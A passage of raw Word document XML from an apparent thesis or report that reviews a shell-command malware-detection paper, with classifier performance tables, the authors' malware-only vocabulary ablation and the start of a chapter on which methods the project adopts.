        <w:t>template repeated at scale. Second, the length separation between classes is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>large and monotone: benign bash history has median 14, malware has median 384.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What the paper reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>At the command level, with both corpora represented, all six model/representation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>combinations land within a tenth of a point of each other (Table 4, left):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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FNR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Term-level LR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.86</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.86</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Term-level RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Term-level DNN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Char-level LR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Char-level RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Char-level DNN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The paper then extends from commands to files, treating an application as the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>concatenation of its commands, and reports up to 99.91 F1 there as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The authors' own ablation — the most useful result in the paper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Section 4.5 asks what happens when the vocabulary is built **only from the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>malware samples**, with no benign data allowed to shape it. This is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>paper's stress test, and the two representations come apart completely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(Table 4, right):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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Term-level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Character-level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Command level (DNN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">99.85 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>89.52</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">99.87 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>98.24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File level (RF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">99.08 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>67.48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">99.91 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File level (DNN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">97.16 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>66.67</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">99.28 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The authors describe the file-level term-level result as "reduced from 99% to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>67%", and the character-level result as "only 1.6% performance degradation."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>A learned word vocabulary loses two thirds of its discriminative power the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>moment it can no longer see both corpora; a character representation loses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>almost nothing. Section 2.2 treats this as the decisive evidence for our own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representational choice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Critically, the authors did not run this ablation as a curiosity. Their</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Section 5.5 explains why: **"the benign dataset may not be considered as a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representative ground-truth benign dataset with an absolute confidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Therefore, and to account for that shortcoming, we evaluated our models using</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representations extracted exclusively from the malware samples."** The concern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that Section 2.2 raises about their benign class is one the authors raise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>themselves, and the malware-only column is their answer to it. The same section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>concedes two further limits: the approach "is limited to malware that do not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>employ obfuscation", and the commands are obtained by static disassembly rather</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>than by observing execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 2.2 — Adopt, Modify, Reject: What This Project Takes from ShellCore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Decisions apply to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (43 engineered features),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/preprocessing.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (character n-gram block) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
